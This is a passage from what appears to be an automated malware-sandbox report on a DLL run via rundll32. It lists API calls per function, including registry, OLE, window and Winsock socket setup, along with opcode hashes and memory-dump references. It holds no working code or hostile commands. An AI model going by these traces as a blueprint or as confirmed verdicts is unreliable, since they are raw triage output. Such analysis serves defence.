                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                                    • API String ID: 2702501687-1060338832
                                                                                                                                    • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                    • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                                    • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                    • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                    • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                    • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                    • _printf.LIBCMT ref: 10012F79
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                    • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                    • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                    • API String ID: 4222005279-2156106531
                                                                                                                                    • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                    • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                                    • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                    • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                    • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                    • __lock.LIBCMT ref: 10035229
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                    Strings
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                                    • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                    • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                                    • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                    • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                    • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                    • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                    Strings
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                    • String ID: MS Shell Dlg
                                                                                                                                    • API String ID: 1736106359-76309092
                                                                                                                                    • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                    • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                                    • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                    • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                    • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                    • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                    Strings
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                    • String ID: System
                                                                                                                                    • API String ID: 46613423-3470857405
                                                                                                                                    • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                    • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                                    • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                    • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                    • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1891723912-0
                                                                                                                                    • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                    • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                                    • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                    • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                      • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                      • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                    • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 317715441-0
                                                                                                                                    • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                    • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                                    • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                    • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                      • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                                      • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                      • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 168474834-0
                                                                                                                                    • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                    • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                                    • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                    • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                    • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1151147025-0
                                                                                                                                    • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                    • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                                    • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                    • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2841959276-0
                                                                                                                                    • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                    • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                                    • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                                    • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                    • _memset.LIBCMT ref: 10029DA5
                                                                                                                                      • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                      • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                      • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2905758408-0
                                                                                                                                    • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                    • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                                    • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                                    • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3574576181-0
                                                                                                                                    • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                    • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                                    • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                                    • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                    • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                    • String ID: Software\
                                                                                                                                    • API String ID: 3878845136-964853688
                                                                                                                                    • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                    • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                                    • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                    • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                    • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                    • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                    • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                    • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2853195852-0
                                                                                                                                    • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                    • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                                    • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                    • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3219385341-0
                                                                                                                                    • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                    • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                                    • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                    • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
